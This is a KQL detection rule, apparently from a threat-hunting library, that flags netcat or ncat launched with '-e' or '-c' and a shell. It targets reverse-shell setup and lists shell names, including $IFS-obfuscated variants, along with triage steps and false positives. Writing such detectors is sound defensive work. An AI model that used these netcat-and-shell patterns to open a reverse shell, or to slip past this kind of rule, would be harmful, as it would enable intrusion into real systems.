Detects execution of netcat with the "-e" flag followed by common shells. This could be a sign of a potential reverse shell setup.
/ncat Shell Execution /nc Shell Execution
LOLBINs Unux Execution
https://github.com/SigmaHQ/sigma/blob/822f0b3d92b41a7a2021c1ec52f0053d764695e1/rules/linux/process_creation/proc_creation_lnx_netcat_reverse_shell.yml
https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
https://www.infosecademy.com/netcat-reverse-shells/
{{ mitre("T1059.004")}}
Data Source(s): Command, Process
let selection_flags = dynamic([' -c ',' -e ' ]);
let selection_shell = dynamic([' ash', ' bash', ' bsh', ' csh', ' ksh', ' pdksh', ' sh', ' tcsh', '/bin/ash', '/bin/bash', '/bin/bsh', '/bin/csh', '/bin/ksh', '/bin/pdksh', '/bin/sh', '/bin/tcsh', '/bin/zsh', '$IFSash', '$IFSbash', '$IFSbsh', '$IFScsh', '$IFSksh', '$IFSpdksh', '$IFSsh', '$IFStcsh', '$IFSzsh']);
DeviceProcessEvents
| where ActionType == "ProcessCreated"
| where FolderPath endswith "/ncat" or FolderPath endswith "/nc" //selection_nc
| where ProcessCommandLine has_any (selection_flags)
| where ProcessCommandLine has_any (selection_shell)
- Validate the use of netcat in the environment, confirm with administrator team
- Verify the account, timestamp, and command lines executed, whether the activity was approved.
- Legitimate admin activities using netcat
Version 1.0 (date: 15/03/2024)